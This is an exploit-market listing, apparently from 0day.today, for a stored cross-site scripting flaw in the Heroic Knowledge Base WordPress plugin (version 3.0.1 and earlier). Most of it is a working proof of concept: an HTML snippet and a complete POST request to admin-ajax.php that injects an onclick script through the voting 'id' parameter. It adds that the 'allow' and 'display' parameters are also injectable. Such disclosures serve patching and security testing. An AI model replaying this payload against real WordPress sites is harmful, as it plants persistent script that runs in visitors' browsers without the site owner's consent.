[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Heroic Knowledge Base 3.0.1 Cross Site Scripting Vulnerability

Author
begininvoke
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35335
Category
web applications
Date add
29-11-2020
Platform
php
#Exploit Title : Heroic Knowledge Base Plugin  <= 3.0.1 - Persistent Cross Site Scripting 
#Exploit Author : begininvoke
#Vendor Homepage : https://herothemes.com



[+] Proof Of Concept:
=====================

# HTML Code #

<div class="ht-voting" id ="ht-voting-post-\"/**/(/* */oNcliCk=alert(1399) )//">

# Methode POST #

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://site.com/knowledge-base/research-strategy-development-roadmap-rsdr/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close

action=ht_voting&direction=up&type=post&nonce=6d2ea5db0f&id="/**/(/* */oNcliCk=alert(1399) )//&allow=anon&display=standard


Parameters allow & display are also vulnerable

#  0day.today [2024-11-16]  #